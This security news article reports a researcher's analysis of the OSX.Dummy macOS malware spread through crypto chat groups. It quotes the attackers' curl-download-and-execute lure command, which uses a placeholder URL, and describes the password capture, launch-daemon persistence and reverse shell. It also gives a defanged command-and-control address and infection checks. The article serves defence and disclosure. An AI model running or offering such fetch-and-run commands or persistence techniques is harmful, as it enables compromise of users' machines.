“Previous days we’ve seen multiple MacOS malware attacks, originating within crypto related Slack or Discord chats groups by impersonating admins or key people. Small snippets are being shared, resulting in downloading and executing a malicious binary.” wrote Verhoef.
The Wardle intent was to demonstrate that the Objective-See’s tools can generically thwart this new threat even if it was undetected by all the anti-virus software.
Verhoef noticed that the attack was originating within crypto related Slack or Discord chats groups by impersonating admins or key people.
The attackers shared small code snippets like the following one resulting in downloading and executing a malicious binary.
$ cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script
Wardle noticed that the malicious binary is not signed, this means it would be blocked by GateKeeper, but attackers overwhelmed this limitation by making the victims to download and run the binary directly via terminal commands.
Wardle conducted a dynamic analysis of the malware using a High Sierra virtual machine with various Objective-See tools installed.
The malware first sets script to be owned as root
# procInfo monitoring for process events... process start: pid: 432 path: /usr/bin/sudo args: ( "/usr/bin/sudo", "-S", "-p", "#node-sudo-passwd#", chown, root, "/tmp/script.sh" )
then it changes file’s permissions to root by executing the sudo command, but this will require the user to enter the password in the terminal.
The password is saved by the malicious code in the folder /tmp/dumpdummy;
The malware makes a series of operations that allow it to gain persistence through a malicious launch daemon.
The malware sets up the RunAtLoad key to true, this implies that the value of the Program key, /var/root/script.sh, will be automatically executed by the OS whenever the system is rebooted.
“It then duplicates stdin, stdout and stderr to the socket, before executing /bin/sh with the –i flag. In other words, it’s setting up an interactive reverse shell.” explained Wardle.
“If you have a firewall product installed, such as Objective-See’s LuLu, this network activity will be detected”
If the malware successfully connects the C&C server (
185[.]243.115.230:1337), the attacker will be able to arbitrarily execute commands as root on the target system.
Below the key findings of Wardle analysis on the OSX.Dummy:
“To check if you’re infected run KnockKnock as root (since the malware set’s it components to be readable only by root). Look for an unsigned launch item com.startup.plist executing something named ‘script.sh'” Wardle concluded.
(Security Affairs – malware, OSX.Dummy)
Necessary cookies are absolutely essential for the website to function properly. This category only includes cookies that ensures basic functionalities and security features of the website. These cookies do not store any personal information.
Any cookies that may not be particularly necessary for the website to function and is used specifically to collect user personal data via analytics, ads, other embedded contents are termed as non-necessary cookies. It is mandatory to procure user consent prior to running these cookies on your website.